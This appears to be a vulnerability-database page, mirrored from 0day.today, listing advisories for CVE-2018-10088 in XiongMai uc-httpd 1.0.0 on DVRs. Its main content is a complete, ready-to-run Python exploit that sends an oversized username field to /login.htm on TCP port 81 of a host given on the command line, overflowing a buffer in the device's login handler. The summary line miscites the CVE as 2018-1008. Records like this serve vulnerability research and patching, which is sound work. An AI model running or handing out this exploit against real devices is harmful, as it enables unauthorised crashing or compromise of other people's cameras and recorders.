Lucene search
+L

XiongMai uc-httpd 1.0.0 - Buffer Overflow Exploit

🗓️ 09 Jun 2018 00:00:00Reported by Andrew WatsonType 
zdt
 zdt
🔗 0day.today👁 1240 Views

XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit, CVE-2018-1008

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Xiongmaitech Ahb7008F8-H_Firmware
13 Apr 201807:43
githubexploit
ATTACKERKB
CVE-2018-10088
8 Jun 201800:00
attackerkb
Circl
CVE-2018-10088
18 Jun 201809:04
circl
CNVD
XiongMai uc-httpd Buffer Overflow Vulnerability
12 Jun 201800:00
cnvd
Check Point Advisories
XiongMai uc-httpd Buffer Overflow (CVE-2018-10088)
29 Jul 201800:00
checkpoint_advisories
CVE
CVE-2018-10088
8 Jun 201812:00
cve
Cvelist
CVE-2018-10088
8 Jun 201812:00
cvelist
Exploit DB
XiongMai uc-httpd 1.0.0 - Buffer Overflow
8 Jun 201800:00
exploitdb
exploitpack
XiongMai uc-httpd 1.0.0 - Buffer Overflow
8 Jun 201800:00
exploitpack
Nuclei
XiongMai uc-httpd 1.0.0 - Buffer Overflow
27 Jul 202604:16
nuclei
Rows per page
# Exploit Title: XiongMai uc-httpd 1.0.0 - Buffer Overflow          
# Exploit Author: Andrew Watson
# Software Version: XiongMai uc-httpd 1.0.0
# Vendor Homepage: http://www.xiongmaitech.com/en/
# Tested on: KKMoon DVR running XiongMai uc-httpd 1.0.0 on TCP/81
# CVE ID: CVE-2018-10088
# DISCLAIMER: This proof of concept is provided for educational purposes only!
 
#!/usr/bin/python
 
import socket
import sys
 
payload="A" * 85
 
print "\n###############################################"
print "XiongMai uc-httpd 1.0.0 Buffer Overflow Exploit"
 
if len(sys.argv) < 2:
    print "\nUsage: " + sys.argv[0] + " <Host>\n"
    sys.exit()
 
print "\nTarget: " + sys.argv[1]
print "Sending exploit..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],81))
s.send('POST /login.htm HTTP/1.1\r\n')
s.send('command=login&username=' + payload + '&password=PoC\r\n\r\n')
s.close()
print "\nExploit complete!"

#  0day.today [2018-06-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation